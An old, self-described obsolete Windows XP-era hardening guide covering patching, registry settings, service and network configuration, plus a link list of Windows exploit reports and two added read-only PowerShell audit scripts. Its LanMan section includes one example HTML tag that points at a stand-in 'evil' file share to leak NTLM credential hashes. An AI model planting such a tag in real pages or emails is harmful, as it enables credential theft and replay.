Secure your PC
OBSOLETE
This page is somewhat obsolete: it was essential up to the times of
WinXP and Vista, somewhat useful for Win7, and is less relevant for
Win10 or 11. Still, you should be familiar with the issues mentioned
below.
With all the hullabaloo about the virus or worm du jour, you may want to
make your Windows PC more secure. See disclaimer at end.
You should also check out the Australian Cyber guides and the US Cyber
Defense pages, including their Best Practices for Home suggestions.
Commonsense, common settings
- Do not execute malicious code: do not click away, surely not at
attachments in email messages: please follow sensible strategies for
dealing with attachments.
- Turn Java (and JavaScript?) off in your browser: in Mozilla Firefox go
to Tools > Options > Content (and > Advanced) and un-check them.
Anti-Virus issues
- Disable AutoRun (or AutoPlay) on CD and USB devices. This is not as
simple as it should be, see the CERT and TechNet writeups for details;
even then you may not be protected, see a later blog post, comments about
folder icons and U3, and also USB issues and more.
- Get (and use) some anti-virus software. See the virus page (musings,
F-Prot and Norton).
Virus checking is a reactive defense: viruses are only recognized after
they have spread and are added to the collection. Be proactive instead,
and make your computer immune to (current and future) viruses and other
attacks. Think of the benefits: no more weekly update of anti-virus
packages (just a weekly check here whether a new vulnerability has been
found...).
Firewall issues
- Should say something about firewalls... but have not got around to it
yet... any day now.
- My home PCs are behind a router/firewall, my work machines behind a
firewall/proxy server. Both kinds protect against many worm-type attacks.
- If you use a router/firewall then keep it secure:
E-commerce and webmail
- Do e-commerce business with, and have webmail hosted by, secure
companies only. Are they able to safeguard the privacy of your credit card
number: can someone hijack your login session through a vulnerability of
their website (see examples of Cross Site Scripting vulnerabilities)?
- Ensure you transact business with the right company, not an impostor:
see newspaper articles about Opera House and followup. Do not fall for
(fake email) scams like those attacking eBay, CommBank (and followup), or
ANZ Bank.
- Keep your email address "forever": do not allow your webmail address to
expire (and be deleted so someone else can set it up) or your company to
go out of business: taking over your email address may allow access to
private info you had set elsewhere.
Backups
- Regularly back up important files e.g. to the "cloud" (GoogleDrive,
SkyDrive, Dropbox etc), or a second hard disk, writable CDs, USB memory
sticks or even floppies. The MS Backup utility in Start Menu > Programs >
Accessories > System Tools is fine (or see \valueadd\msft\ntbackup on your
WinXP CD). Include System State among the backed-up objects.
- Regular backups may help you to recover from a security compromise.
Disable unused features
- Do not install (or uninstall, or rename) unused software: Internet
Explorer, Outlook, Excel and Access (even Word and other parts of MS
Office) seem to be targeted often.
- Disable unused Windows features. More details below...
Solution?
Install Ubuntu Linux (as I do at home).
Install Microsoft patches
Since April 2017, Microsoft moved to a Security Update Guide delivery of
patches: not one bulletin per product, but many individual updates for
each issue and each specific product version. Thus it is not feasible or
useful to maintain a list of patches required; I will only keep a list of
"known issues", or issues that show that regular updates are important.
Recent issues (or see full list):
Reference(s):
https://portal.msrc.microsoft.com/en-us/security-guidance
https://portal.msrc.microsoft.com/en-us/security-guidance/summary
https://technet.microsoft.com/en-us/security/advisories
http://blogs.technet.microsoft.com/msrc/
http://blogs.technet.microsoft.com/srd/
http://blogs.technet.microsoft.com/mmpc/
NOTE that on late-model "7th generation" CPUs only Windows10 is supported:
there are no Windows Updates for Win7 and Win8.1, see
http://support.microsoft.com/help/4012982
(but see also attempts at re-enabling updates).
BEWARE that some patches may make your machine inoperable (e.g. the
Jul2020 Outlook issues here and here, issues and more with the Oct2018
Win10 updates, or my DellLatitude7390 laptop that in Aug2018 crashed to a
blue screen due to some updates, or KB4088875/4088878,
KB4074588/KB4058258/KB4056892, KB4049094 or KB4015549).
BEWARE that M$ patches do not address all known vulnerabilities.
BEWARE that installing patches or upgrading M$ software may un-install or
un-do seemingly unrelated patches (e.g. re-install outdated Flash or
libraries).
BEWARE that installing any patches may overwrite any
customizations (may need to undo them to install the patch):
re-check and re-do all your changes as below.
BEWARE that M$ often changes the underlying patches without
updating the bulletins or KB articles, sometimes changing the file
binaries without updating version numbers.
BEWARE that even big companies make mistakes and may release broken or
unwanted patches.
NOTE that Windows7 and Office2010 are now out of support, see the Support
Lifecycle Index.
USyd users please note the site licences for MS software.
Do not use Internet Explorer or Edge
IE has a long history of vulnerabilities, left un-fixed for years: do not
use it. Note that IE is used for many registered File Types and you may
want to remove them, or use regedit to search for and clobber most
occurrences of iexplore. It may be best to rename the software so it is
not accessible. Use Mozilla instead.
Note that you still need to keep IE up-to-date with patches, and set
secure IE options (even if you do not use IE), for the many Web-enabled
applications. Windows Explorer in particular will internally handle HTTP
and FTP URLs, disregarding the "URL protocol handler" in the registry, and
is certainly unsafe without careful IE option settings. I wonder if Word
can do JavaScript or VBS in a safe way... So occasionally you will need to
rename the software back in place, patch it, start it up and set secure
options, then hide it again.
To set secure options, go to Tools >
Internet Options, then select Security and
Advanced tabs (in Security, set things to Custom to
have fun): see
You may also use third-party "IE hardeners":
IE11 (for Win8.1 then Win7) was released Oct-Nov13 with "better
compatibility", "state of the art performance" and "advanced consumer
security":
Support for versions prior to IE11 ceased on 12 Jan 2016, see:
https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support
In Windows10, IE is replaced by Microsoft Edge that is claimed to be more
secure (e.g. note how ActiveX is termed "older, less secure").
Reference(s) (see IE history for more):
Do not use Access or Outlook (or Excel or Word)
There are bugs in MSAccess that allow the execution of any VBA macros; bugs
remain in Outlook that allow execution of arbitrary code. Do not use them:
rename Access, Outlook and VBA (also DAO, used in the ihackstuff exploit)
so they are not accessible. (Do other MS Office components too: at least
Excel, preferably most others, even Word, at the same time.)
Use OpenOffice instead.
Reference(s):
Set Word options
Apply some protection settings in MSWord against harmful macros. (Would be
tempting to disable Word along with the rest of MS Office, but...)
Reference(s):
If you use Office XP or 2003, then beware of it sending debugging
information, containing your sensitive documents, to Microsoft. Use
regedit to set:
- for Office XP, DWNeverUpload, DWNoExternalURL, DWNoFileCollection and
DWNoSecondLevelCollection to 1 in both
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\10.0\Common] and
[HKEY_USERS\.Default\Software\Policies\Microsoft\Office\10.0\Common];
- for Office 2003, QMEnable to 0 in
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common].
Reference(s):
Apply privacy settings, or your document will contain unwanted
information.
Reference(s):
Banish LanMan passwords
If you use any Windows passwords, e.g. to connect to a Samba server, then
ensure that only NTLM or NTLMv2 password hashes are used. The older LM hash
is insecure as it can be cracked easily. (Cracking NTLM hashes is
significantly harder, see L0phtCrack.)
Both LM and NTLM hashes are replayable: there may be no need to crack them.
Windows may be tricked into revealing your credentials, e.g. by using
<img src=file:\\evil\pub.gif> in an HTML email or
web page. Use NTLMv2 hashes if possible.
I need to set my Samba server not to accept an LM hash ("lanman auth = no"
in smb.conf; check also "min protocol"). This does not buy much per se: if
the attacker has the LM hash, then he could crack the password and win; or
he could replay the NTLM hash, as he is likely to also have that. As the
user is likely to have the same password elsewhere, we should protect
against crackable LM hashes even if we are vulnerable to NTLM hash replays.
Configure clients so they never send an LM hash; by hacking Samba to
actively reject users who send an LM hash, clients can be forced to update
their settings.
Samba 3.0.5 supports NTLMv2 but not message encryption (Samba 2.2.8a does
not support either).
To use NTLMv2 authentication on Win9x, you need to install the Directory
Services Client (in Clients\Win9x\Dsclient.exe on the Windows2000 Server
CD). You can then un-install this client: the NTLMv2 support files will
stay behind.
It seems that Win9x can only do LM or NTLMv2, and cannot do NTLM
authentication (which makes sense as the only allowed values of
LMCompatibility are 0 or 3). (Samba 2.2.8a and Win9x cannot communicate
securely.)
Use regedit to:
- Set HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibility=3 and/or
LmCompatibilityLevel=3 so only NTLMv2 passwords are sent. May need to set
this to 2 to use NTLM with Samba 2.2.8a (Samba supports NTLMv2 from
version 3.0.5 only).
- Set HKLM\System\CurrentControlSet\Control\Lsa\MSV1_0\NtlmMinClientSec=0
and NtlmMinServerSec=0x20080030 for the message encryption levels you accept.
Would like NtlmMinClientSec to also be 0x20080030 but Samba 3.0.5
does not yet support encryption.
- Set HKLM\System\CurrentControlSet\Control\Lsa\NoLMHash so no LanMan
hashes are created or stored locally.
- On Windows 2000 machines, also consider setting
HKLM\System\CurrentControlSet\Control\Lsa\RestrictAnonymous=2 .
Reference(s):
Disable unused services
This is a bit long... see the sub-sections on services, network and
registry settings, see what ports are open, and some further checking.
Services setup
Disable the services you do not need in My Computer (right-click) >
Manage > Services and Applications > Services.
My WinXP home computer happily survives with just
Name                                Status   Startup Type
Application Management                       Disabled
COM+ Event System                   Started  Manual
DHCP Client                         Started  Automatic
DNS Client                          Started  Automatic
Event Log                           Started  Automatic
Human Interface Device Access                Disabled
LexBce Server                       Started  Automatic   (my Lexmark printer?)
Messenger                                    Disabled
Network Connections                 Started  Manual
Network Location Awareness (NLA)    Started  Manual
Plug and Play                       Started  Automatic
Print Spooler                       Started  Automatic
Protected Storage                   Started  Automatic
Remote Access Connection Manager    Started  Manual
Remote Procedure Call (RPC)         Started  Automatic
Routing and Remote Access                    Disabled
Security Accounts Manager           Started  Automatic
Server                              Started  Automatic
SSDP Discovery Service                       Disabled
System Event Notification           Started  Manual
Task Scheduler                               Disabled
Telephony                           Started  Manual
Terminal Services                   Started  Manual
Windows Audio                       Started  Automatic
Windows Management Instrumentation  Started  Manual
Workstation                         Started  Automatic
(rest are manual startup and not running).
My WinXP work PC (hanging off a Samba PDC) has (excessive, unsafe?)
Name                                   Status   Startup Type
Alerter                                Started  Automatic
Application Layer Gateway Service      Started  Manual
Automatic Updates                               Disabled
Background Intelligent Transfer Serv            Disabled
ClipBook                                        Disabled
COM+ Event System                      Started  Manual
Computer Browser                       Started  Automatic
DCOM Server Process Launcher           Started  Automatic
DHCP Client                            Started  Automatic
DNS Client                                      Disabled
Error Reporting Service                         Disabled
Event Log                              Started  Automatic
Help and Support                                Disabled
HID Input Service                      Started  Automatic
Messenger                              Started  Automatic
MS Software Shadow Copy Provider                Disabled
Net Logon                              Started  Automatic
NetMeeting Remote Desktop Sharing               Disabled
Network Connections                    Started  Manual
Network DDE                                     Disabled
Network DDE DSDM                                Disabled
Network Location Awareness (NLA)       Started  Manual
Performance Logs and Alerts                     Disabled
Plug and Play                          Started  Automatic
Print Spooler                          Started  Automatic
Protected Storage                      Started  Automatic
Remote Access Auto Connection Manager           Disabled
Remote Access Connection Manager                Disabled
Remote Procedure Call (RPC)            Started  Automatic
Routing and Remote Access                       Disabled
Secondary Logon                        Started  Automatic
Security Accounts Manager              Started  Automatic
Security Center                                 Automatic
Server                                 Started  Automatic
Shell Hardware Detection               Started  Automatic
Smart Card                                      Disabled
SoundMAX Agent Service                 Started  Automatic
SSDP Discovery Service                          Disabled
System Event Notification              Started  Automatic
System Restore Service                          Disabled
Telnet                                          Disabled
Terminal Services                      Started  Manual
Themes                                 Started  Automatic
User Profile Hive Cleanup              Started  Automatic
Volume Shadow Copy                              Disabled
WebClient                              Started  Automatic
Windows Audio                          Started  Automatic
Windows Firewall/ICS                   Started  Automatic
Windows Management Instrumentation     Started  Manual
Windows Time                           Started  Automatic
WinMonitor                             Started  Automatic   (home-grown management)
Wireless Zero Configuration                     Disabled
Workstation                            Started  Automatic
(rest are manual startup and not running).
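As an added example (not code from this page), a read-only PowerShell check that compares the services on the current machine with the minimal WinXP home configuration listed above; the two name lists are copied from that table, and the display names are assumed to match what the Services console shows.

```powershell
# Added example, not from the original page: report services that differ
# from the page's minimal WinXP home configuration. Read-only.
# On newer Windows versions many more services legitimately run, so treat
# what is flagged as a review list, not as a list of things to disable.

# Services the page shows as Started on the minimal home PC.
$ExpectedRunning = @(
    'COM+ Event System', 'DHCP Client', 'DNS Client', 'Event Log',
    'LexBce Server', 'Network Connections', 'Network Location Awareness (NLA)',
    'Plug and Play', 'Print Spooler', 'Protected Storage',
    'Remote Access Connection Manager', 'Remote Procedure Call (RPC)',
    'Security Accounts Manager', 'Server', 'System Event Notification',
    'Telephony', 'Terminal Services', 'Windows Audio',
    'Windows Management Instrumentation', 'Workstation'
)
# Services the page shows as Disabled on the same PC.
$ExpectedDisabled = @(
    'Application Management', 'Human Interface Device Access', 'Messenger',
    'Routing and Remote Access', 'SSDP Discovery Service', 'Task Scheduler'
)

function Get-ServiceDrift {
    param(
        [string[]]$Running  = $ExpectedRunning,
        [string[]]$Disabled = $ExpectedDisabled
    )
    # Win32_Service exposes State (Running/Stopped), StartMode
    # (Auto/Manual/Disabled), the account it runs as and the image path:
    # the details needed to decide whether an unexpected service is legitimate.
    foreach ($s in Get-CimInstance -ClassName Win32_Service) {
        $finding = $null
        if ($s.State -eq 'Running' -and $Running -notcontains $s.DisplayName) {
            $finding = 'running but not on the minimal list'
        }
        elseif ($Disabled -contains $s.DisplayName -and $s.StartMode -ne 'Disabled') {
            $finding = "expected Disabled, start mode is $($s.StartMode)"
        }
        if ($finding) {
            [pscustomobject]@{
                DisplayName = $s.DisplayName
                Name        = $s.Name
                State       = $s.State
                StartMode   = $s.StartMode
                RunsAs      = $s.StartName
                Path        = $s.PathName
                Finding     = $finding
            }
        }
    }
}

Get-ServiceDrift | Sort-Object Finding, DisplayName | Format-Table -AutoSize -Wrap
```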
Network setup
Find your network connections (devices, interfaces) in Start Menu >
[ Settings or Control Panel ? ] > Network and Dial-up Connections, and
their properties in Local Area Connection > Properties or Dial-up >
Properties > Networking.
Completely disable unused network interfaces, particularly wireless
interfaces on itinerant laptops.
Decide if any are "trusted" networks: your dial-up internet connection
is certainly un-trusted. My home PCs trust the LAN interface: my other PC
(only) is on that network, and I want them to share everything.
Ensure all un-trusted connections have File and printer sharing for
Microsoft Networks disabled. You should only have Client for Microsoft
Networks and Internet Protocol (TCP/IP) listed among the
protocols/services used. My home PCs show:
Dial-up, Properties, Networking, "... uses the following items":
[x] Internet Protocol (TCP/IP)
[ ] File and Printer Sharing for Microsoft Networks
[x] Client for Microsoft Networks
Local Area Connection, Properties, "... uses the following items":
[x] Client for Microsoft Networks
[x] File and Printer Sharing for Microsoft Networks
[x] Internet Protocol (TCP/IP)
while my work PC has
Local Area Connection, Properties, "... uses the following items":
[x] Client for Microsoft Networks
[x] Internet Protocol (TCP/IP)
You should enable File and printer sharing on trusted networks only,
and only if you really intend to let anyone see (and delete or change) your
files. (It may be possible to have sharing with controls on who can do
what, but is beyond my abilities.) You may un-install File and printer
sharing if no network interfaces need it. Do not delete Client for
Microsoft Networks as some dial-up features rely on it.
Ensure all un-trusted connections have Disable NetBIOS over TCP/IP
selected in Internet Protocol (TCP/IP) > Properties > Advanced > WINS.
My home PCs have more-or-less:
Dial-up, Properties, Networking, Internet Protocol (TCP/IP), Properties,
(Automatic IP and DNS), Advanced, WINS: "Disable NetBIOS over TCP/IP".
Local Area Connection, Properties, Internet Protocol (TCP/IP), Properties,
Advanced:
IP 192.168.111.112, netmask 255.255.255.0
Gateway (none)
DNS server 192.168.111.111
WINS server 192.168.111.111
Enable NetBIOS over TCP/IP
while my work PC has
Local Area Connection, Properties, Internet Protocol (TCP/IP), Properties,
(Automatic IP and DNS), Advanced, WINS: "Use NetBIOS setting from DHCP server".
Registry setup
Use regedit to set:
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LmCompatibilityLevel=3
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=0 (could be 1?)
HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\MaxWorkItems=256
HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\SmbDeviceEnabled=0
HKLM\SYSTEM\CurrentControlSet\Services\Rpc\Linkage\Bind=(empty, REG_MULTI_SZ or REG_SZ)
HKLM\SYSTEM\CurrentControlSet\Services\RpcSs\ListenOnInternet=N
HKLM\SOFTWARE\Microsoft\Ole\EnableDCOM=N
HKLM\SOFTWARE\Microsoft\Rpc\DCOM Protocols=(not including ncacn_ip_tcp)
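As an added example (not code from this page), a read-only PowerShell audit of the registry values listed under "Banish LanMan passwords" and "Registry setup" above, which is worth re-running after every patch round since patches may overwrite these customizations. Expected values are taken from those lists; NoLMHash=1 is an assumption (the page names the value without a number; 1 is the documented WinXP/2003 DWORD), and RestrictAnonymous is only reported, not judged, because the page gives 0, 1 and 2 in different places.

```powershell
# Added example, not from the original page: audit the registry hardening
# values this page recommends. Nothing is modified; run elevated so that
# every key is readable.

$Lsa   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$Msv   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$Srv   = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$NetBT = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters'
$Link  = 'HKLM:\SYSTEM\CurrentControlSet\Services\Rpc\Linkage'
$RpcSs = 'HKLM:\SYSTEM\CurrentControlSet\Services\RpcSs'
$Ole   = 'HKLM:\SOFTWARE\Microsoft\Ole'
$RpcSw = 'HKLM:\SOFTWARE\Microsoft\Rpc'

# One entry per value: where it lives, what the page wants, and a predicate
# over the stored value. Absent values are reported as MISSING and never
# reach the predicate.
$Checks = @(
    @{ Path = $Lsa;   Name = 'LmCompatibilityLevel'; Want = '3 (send NTLMv2 only)'
       Test = { param($v) $v -eq 3 } }
    @{ Path = $Lsa;   Name = 'NoLMHash';             Want = '1 (assumed: store no LM hash)'
       Test = { param($v) $v -eq 1 } }
    @{ Path = $Lsa;   Name = 'RestrictAnonymous';    Want = 'present (page: 0 or 1; 2 on Win2000)'
       Test = { param($v) $true } }
    @{ Path = $Msv;   Name = 'NtlmMinClientSec';     Want = '0 now, 0x20080030 once the server can encrypt'
       Test = { param($v) $v -eq 0 -or $v -eq 0x20080030 } }
    @{ Path = $Msv;   Name = 'NtlmMinServerSec';     Want = '0x20080030'
       Test = { param($v) $v -eq 0x20080030 } }
    @{ Path = $Srv;   Name = 'MaxWorkItems';         Want = '256'
       Test = { param($v) $v -eq 256 } }
    @{ Path = $NetBT; Name = 'SmbDeviceEnabled';     Want = '0'
       Test = { param($v) $v -eq 0 } }
    @{ Path = $Link;  Name = 'Bind';                 Want = 'empty (REG_SZ or REG_MULTI_SZ)'
       Test = { param($v) @($v | Where-Object { $_ -ne '' }).Count -eq 0 } }
    @{ Path = $RpcSs; Name = 'ListenOnInternet';     Want = 'N'
       Test = { param($v) "$v" -eq 'N' } }
    @{ Path = $Ole;   Name = 'EnableDCOM';           Want = 'N'
       Test = { param($v) "$v" -eq 'N' } }
    @{ Path = $RpcSw; Name = 'DCOM Protocols';       Want = 'without ncacn_ip_tcp'
       Test = { param($v) @($v) -notcontains 'ncacn_ip_tcp' } }
)

function Test-HardeningValue {
    param([string]$Path, [string]$Name, [string]$Want, [scriptblock]$Test)
    $status = 'MISSING'
    $actual = $null
    if (Test-Path -Path $Path) {
        # Read the whole key: -Name would throw on an absent value, and one
        # value name ("DCOM Protocols") contains a space.
        $prop = (Get-ItemProperty -Path $Path).PSObject.Properties[$Name]
        if ($null -ne $prop) {
            $actual = $prop.Value
            $status = if (& $Test $actual) { 'OK' } else { 'DRIFT' }
        }
    }
    # DWORDs are shown in hex too, so 0x20080030 is recognisable at a glance.
    $shown = '<absent>'
    if ($null -ne $actual) {
        if ($actual -is [int]) { $shown = '0x{0:X} ({0})' -f $actual }
        else { $shown = @($actual) -join ',' }
    }
    [pscustomobject]@{
        Status = $status
        Key    = $Path -replace '^HKLM:\\', 'HKLM\'
        Name   = $Name
        Wanted = $Want
        Actual = $shown
    }
}

function Get-HardeningReport {
    foreach ($c in $Checks) { Test-HardeningValue @c }
}

# Anything DRIFT or MISSING is a setting a patch or upgrade may have undone.
Get-HardeningReport | Sort-Object Status | Format-Table -AutoSize -Wrap
```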
Reference(s):
Am I now safe even without MS03-026, MS03-039, MS03-049, MS04-011 or
MS04-012 patches in place? My home PC has survived Blaster, Welchia and
Sasser; my office machine is behind a firewall, so has not been tested.
Ports open
My home PCs have only a few ports open:
C:\> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 4
TCP 192.168.111.112:139 0.0.0.0:0 LISTENING 4
UDP 0.0.0.0:1029 *:* 796
UDP 192.168.111.112:137 *:* 4
UDP 192.168.111.112:138 *:* 4
(On Win2k use just netstat -an, or TCPView from
http://www.sysinternals.com/ to show process IDs.)
TaskManager shows (among others):
Image Name PID User Name
SVCHOST.EXE 796 NETWORK SERVICE
System 4 SYSTEM
The line
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 4
is due to the Remote Access Connection Manager service; you
need it for dial-up connections (set it to disabled and reboot to see
the port go away, along with your dial-up settings).
This port seems harmless, not actually open as
telnet localhost 1026
fails, same as any other non-open port.
Surely it is a bug in System:4 that it opens
but forgets to close the port.
The line
UDP 0.0.0.0:1029 *:* 796
seems to appear some minutes after boot only.
The connections shown by netstat do not change when I dial-up connect.
My work PC has open:
C:\>netstat -an
Active Connections
Proto Local Address Foreign Address State
TCP 129.78.94.2:139 0.0.0.0:0 LISTENING
UDP 129.78.94.2:137 *:*
UDP 129.78.94.2:138 *:*
Maybe all those are needed...
Further checks
Check the registry for processes started at boot or login time, ensure
all are legitimately needed.
Reference(s):
I wonder if it would be possible or useful to set
DisableIPSourceRouting=2
EnableDeadGWDetect=0
EnableICMPRedirect=0
EnablePMTUDiscovery=0
NoNameReleaseOnDemand=1
PerformRouterDiscovery=0
SynAttackProtect=2
in both
HKLM\System\CurrentControlSet\Services\AFD\Parameters
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters
Reference(s):
Do not rely on WinXP/Vista/7/8/10 security
Do not assume that WinXP, Vista, Win7, 8 or 10 are secure, but expect
local users to easily get "administrator" privileges: Windows has
bad design, foolish defaults, and some bugs for attackers to exploit.
Still, you should not normally log in as Administrator, but as some
low-level user; and should protect the machine from low-level users, e.g.
with sensible file and registry permissions. Then malware will not be able
to install itself as a system service (foiling a number of viruses):
see e.g.
(Power users getting admin is a "known bug", see
http://support.microsoft.com/kb/825069 .)
Reference(s):
- Patch Tuesday Revisited - CVE-2020-1048 isn't as "Medium" as MS Would Have You Believe
https://isc.sans.edu/forums/diary/Patch+Tuesday+Revisited+CVE20201048+isnt+as+Medium+as+MS+Would+Have+You+Believe/26124/
PrintDemon: Print Spooler Privilege Escalation, Persistence & Stealth (CVE-2020-1048 & more)
https://windows-internals.com/printdemon-cve-2020-1048/
- Defeat Windows Defender (Re: Defense in depth -- the Microsoft way (part 64): Windows Defender loads and exeutes arbitrary DLLs)
https://seclists.org/fulldisclosure/2020/Mar/53
https://skanthak.homepage.t-online.de/offender.html
- Windows has a new wormable vulnerability, and there's no patch in sight
https://arstechnica.com/information-technology/2020/03/windows-has-a-new-wormable-vulnerability-and-theres-no-patch-in-sight/
Microsoft Guidance for Disabling SMBv3 Compression
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005
Microsoft delivers emergency patch to fix wormable Windows 10 flaw
https://arstechnica.com/information-technology/2020/03/microsoft-delivers-emergency-patch-to-fix-wormable-windows-10-flaw/
CVE-2020-0796 | Windows SMBv3 Client/Server Remote Code Execution Vulnerability
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
- CVE-2019-19363 - Local Privilege Escalation in many Ricoh Printer Drivers for Windows
http://seclists.org/fulldisclosure/2020/Jan/34
Truly universal, or specific to Ricoh?
- Microsoft Patches Windows UAC Flaw
https://www.sans.org/newsletters/newsbites/xxi/92
Thanksgiving Treat: Easy-as-Pie Windows 7 Secure Desktop Escalation of Privilege
https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
CVE-2019-1388 | Windows Certificate Dialog Elevation of Privilege Vulnerability
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
- Microsoft Windows .Reg File / Dialog Box Message Spoofing Vulnerability
http://seclists.org/fulldisclosure/2019/Mar/27
- Microsoft Windows task scheduler contains a local privilege escalation vulnerability in the ALPC interface
http://www.kb.cert.org/vuls/id/906424
- Microsoft Master File Table bug exploited to BSOD Windows 7, 8.1
http://www.theregister.co.uk/2017/05/29/microsoft_master_file_table_bug_exploited_to_bsod_windows_7_81/
- Stealing Windows Credentials Using Google Chrome
http://seclists.org/fulldisclosure/2017/May/61
http://www.defensecode.com/news_article.php?id=21
- Defense in depth -- the Microsoft way (part 46): no checks for common path handling errors in "Application Verifier"
http://seclists.org/fulldisclosure/2017/Mar/68
Defense in depth -- the Microsoft way (part 47): "AppLocker bypasses are not serviced via monthly security roll-ups"
http://seclists.org/fulldisclosure/2017/Mar/69
- CPU Flaw Can Be Exploited to Bypass ASLR
http://www.sans.org/newsletters/newsbites/xix/14#308
- Improved scripts in .lnk files now deliver Kovter in addition to Locky
http://blogs.technet.microsoft.com/mmpc/2017/02/02/improved-scripts-in-lnk-files-now-deliver-kovter-in-addition-to-locky/
- Microsoft Windows SMB Tree Connect Response denial of service vulnerability
http://www.kb.cert.org/vuls/id/867968
Windows SMBv3 Denial of Service Proof of Concept (0 Day Exploit)
http://isc.sans.edu/forums/diary/22029
- Malicious Office files using fileless UAC bypass to drop KEYBASE malware
http://isc.sans.edu/forums/diary/22011
- Making Windows 10 a bit less "Creepy" - Common Privacy Settings
http://isc.sans.edu/forums/diary/21947
- UAC Bypass in JScript Dropper
http://isc.sans.edu/forums/diary/21813
- Windows 10 Cannot Protect Insecure Applications Like EMET Can
http://insights.sei.cmu.edu/cert/2016/11/windows-10-cannot-protect-insecure-applications-like-emet-can.html
- MSRT November 2016: Unwanted software has nowhere to hide in this month's release
http://blogs.technet.microsoft.com/mmpc/2016/11/08/msrt-november-2016-unwanted-software-has-nowhere-to-hide-in-this-months-release/
No matter how it attempts to hide, though, most Soctuseer installations and system modifications will be uncovered and removed...
Most but not all?
- Bypass-UAC, a framework to perform UAC bypasses based on auto elevating IFileOperation COM object method calls
https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC
- Force allow access button to Bypass windows firewall
http://seclists.org/fulldisclosure/2016/Jun/8
- Defense in depth -- the Microsoft way (part 37): MMC.exe and DrvInst.exe load and execute ".dll" with elevated resp. SYSTEM privileges
http://seclists.org/fulldisclosure/2015/Dec/30
- yet another (trivial) UAC bypass resp. privilege escalation
http://www.securityfocus.com/archive/1/536396
- Re-Direct to SMB Vulnerability Affects All Versions of Windows
http://www.sans.org/newsletters/newsbites/xvii/29#300
- Windows Local WebDAV NTLM Reflection Elevation of Privilege
http://seclists.org/fulldisclosure/2015/Mar/149
https://code.google.com/p/google-security-research/issues/detail?id=222
- Windows Elevation of Privilege in User Profile Service
https://code.google.com/p/google-security-research/issues/detail?id=123
- Windows 8 Privilege Escalation
http://seclists.org/fulldisclosure/2015/Jan/1
- Microsoft DHCP INFORM Configuration Overwrite
http://seclists.org/fulldisclosure/2014/May/161
- Defense in depth -- the Microsoft way (part 11): privilege escalation for dummies
http://lists.grok.org.uk/pipermail/full-disclosure/2013-October/091643.html
- Windows 7/8 admin account installation password stored in the clear in LSA Secrets
http://www.securityfocus.com/archive/1/527210
- Abusing Windows 7 Recovery Process
http://lists.grok.org.uk/pipermail/full-disclosure/2013-June/090850.html
Owning Windows 7 - From Recovery to "nt authority\system" - Physical Access Required
http://intelcomms.blogspot.com.au/2013/05/owning-windows-7-from-recovery-to-nt.html
- exploitation ideas under memory pressure
... working exploit that grants SYSTEM ...
http://lists.grok.org.uk/pipermail/full-disclosure/2013-May/090476.html
http://lists.grok.org.uk/pipermail/full-disclosure/2013-May/090496.html
http://lists.grok.org.uk/pipermail/full-disclosure/2013-June/090617.html
Introduction to Windows Kernel Security Research
http://blog.cmpxchg8b.com/2013/05/introduction-to-windows-kernel-security.html
- Privilege Escalation Vulnerability in Microsoft Windows (HTB23108)
http://www.securityfocus.com/archive/1/524354
- Defeating PatchGuard - Bypassing Kernel Security Patch Protection in Microsoft Windows
http://www.mcafee.com/us/resources/reports/rp-defeating-patchguard.pdf
- [Positive Research] Intel SMEP overview and partial bypass on Windows 8 (whitepaper)
http://www.securityfocus.com/archive/1/524176
[Positive Research] Intel SMEP Part II: Bypassing Intel SMEP on Windows 8 x64 Using Return-oriented Programming
http://www.securityfocus.com/archive/1/524225
- How well does Microsoft support (and follow) their mantra "keep your PC updated"?
http://lists.grok.org.uk/pipermail/full-disclosure/2012-August/088015.html
Defense in depth -- the Microsoft way (part 5): sticky, persistent vulnerabilities
http://lists.grok.org.uk/pipermail/full-disclosure/2013-July/091132.html
- New Vulnerability in Windows 7 64 bit
http://isc.sans.edu/forums/diary/12238
Secunia Advisory SA47237 - Microsoft Windows win32k.sys Memory Corruption Vulnerability
http://secunia.com/advisories/47237
Microsoft Windows 'win32k.sys' Remote Memory Corruption Vulnerability
http://www.securityfocus.com/bid/51122
- Microsoft Windows Kernel 'Win32k.sys' Keyboard Layout Local Privilege Escalation Vulnerability
http://www.securityfocus.com/bid/50763
- Microsoft Windows Kernel Word File Handling Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/50462
- Bypassing Windows 7 kernel ASLR
http://lists.grok.org.uk/pipermail/full-disclosure/2011-October/083436.html
- Stack overflow in Microsoft HTML Help 6.1 (CHM files)
http://www.securityfocus.com/archive/1/517441
- MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
http://lists.grok.org.uk/pipermail/full-disclosure/2011-February/079189.html
- Windows Kernel-mode GS Cookies subverted (paper)
http://lists.grok.org.uk/pipermail/full-disclosure/2011-January/078453.html
- On the effectiveness of DEP and ASLR
http://blogs.technet.com/b/srd/archive/2010/12/08/on-the-effectiveness-of-dep-and-aslr.aspx
- Privilege escalation 0-day in almost all Windows versions
http://lists.grok.org.uk/pipermail/full-disclosure/2010-November/077572.html
http://isc.sans.edu/forums/diary/9988
Microsoft Windows RtlQueryRegistryValues() does not adequately validate registry data
